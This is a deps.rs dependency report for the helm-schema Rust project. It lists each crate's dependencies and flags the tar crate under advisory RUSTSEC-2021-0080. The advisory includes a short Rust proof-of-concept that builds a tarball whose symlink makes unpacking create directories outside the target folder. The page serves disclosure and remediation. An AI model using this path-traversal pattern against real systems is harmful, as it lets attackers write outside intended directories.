Deps.rs

romnn / helm-schema

[![dependency status](https://deps.rs/repo/github/romnn/helm-schema/status.svg)](https://deps.rs/repo/github/romnn/helm-schema)

This project might be open to known security vulnerabilities, which can be prevented by tightening the version range of affected dependencies. Find detailed information at the bottom.

Crate clippy-wrapper

No external dependencies! 🙌

Crate test-util

Dependencies

(3 total, all up-to-date)

CrateRequiredLatestStatus
 googletest^00.14.2up to date
 lexpr^0.20.2.7up to date
 similar-asserts^11.7.0up to date

Crate helm-schema-yaml-template

Dependencies

(2 total, all up-to-date)

CrateRequiredLatestStatus
 linked-hash-map^00.5.6up to date
 thiserror^22.0.18up to date

Dev dependencies

(4 total, all up-to-date)

CrateRequiredLatestStatus
 quickcheck^1.11.1.0up to date
 lexpr^0.20.2.7up to date
 indoc^22.0.7up to date
 similar-asserts^11.7.0up to date

Crate helm-schema-template-grammar

Dependencies

(1 total, all up-to-date)

CrateRequiredLatestStatus
 tree-sitter-language^0.10.1.7up to date

Dev dependencies

(1 total, all up-to-date)

CrateRequiredLatestStatus
 similar-asserts^11.7.0up to date

Build dependencies

(1 total, all up-to-date)

CrateRequiredLatestStatus
 cc^11.2.56up to date

Crate helm-schema-ast

Dev dependencies

(1 total, all up-to-date)

CrateRequiredLatestStatus
 similar-asserts^11.7.0up to date

Crate helm-schema-ir

Dev dependencies

(1 total, all up-to-date)

CrateRequiredLatestStatus
 similar-asserts^11.7.0up to date

Crate helm-schema-k8s

Dependencies

(1 total, all up-to-date)

CrateRequiredLatestStatus
 ureq^33.2.0up to date

Dev dependencies

(1 total, all up-to-date)

CrateRequiredLatestStatus
 similar-asserts^11.7.0up to date

Crate helm-schema-gen

Dev dependencies

(1 total, all up-to-date)

CrateRequiredLatestStatus
 similar-asserts^11.7.0up to date

Crate helm-schema-cli

Dependencies

(4 total, 1 possibly insecure)

CrateRequiredLatestStatus
 clap^44.5.60up to date
 flate2^11.1.9up to date
 tar ⚠️^0.40.4.44maybe insecure
 mimalloc^0.10.1.48up to date

Dev dependencies

(2 total, all up-to-date)

CrateRequiredLatestStatus
 similar-asserts^11.7.0up to date
 tempfile^33.26.0up to date

Security Vulnerabilities

tar: Links in archive can create arbitrary directories

RUSTSEC-2021-0080

When unpacking a tarball that contains a symlink the tar crate may create directories outside of the directory it's supposed to unpack into.

The function errors when it's trying to create a file, but the folders are already created at this point.

use std::{io, io::Result};
use tar::{Archive, Builder, EntryType, Header};

fn main() -> Result<()> {
    let mut buf = Vec::new();

    {
        let mut builder = Builder::new(&mut buf);

        // symlink: parent -> ..
        let mut header = Header::new_gnu();
        header.set_path("symlink")?;
        header.set_link_name("..")?;
        header.set_entry_type(EntryType::Symlink);
        header.set_size(0);
        header.set_cksum();
        builder.append(&header, io::empty())?;

        // file: symlink/exploit/foo/bar
        let mut header = Header::new_gnu();
        header.set_path("symlink/exploit/foo/bar")?;
        header.set_size(0);
        header.set_cksum();
        builder.append(&header, io::empty())?;

        builder.finish()?;
    };

    Archive::new(&*buf).unpack("demo")
}

This has been fixed in https://github.com/alexcrichton/tar-rs/pull/259 and is published as tar 0.4.36. Thanks to Martin Michaelis (@mgjm) for discovering and reporting this, and Nikhil Benesch (@benesch) for the fix!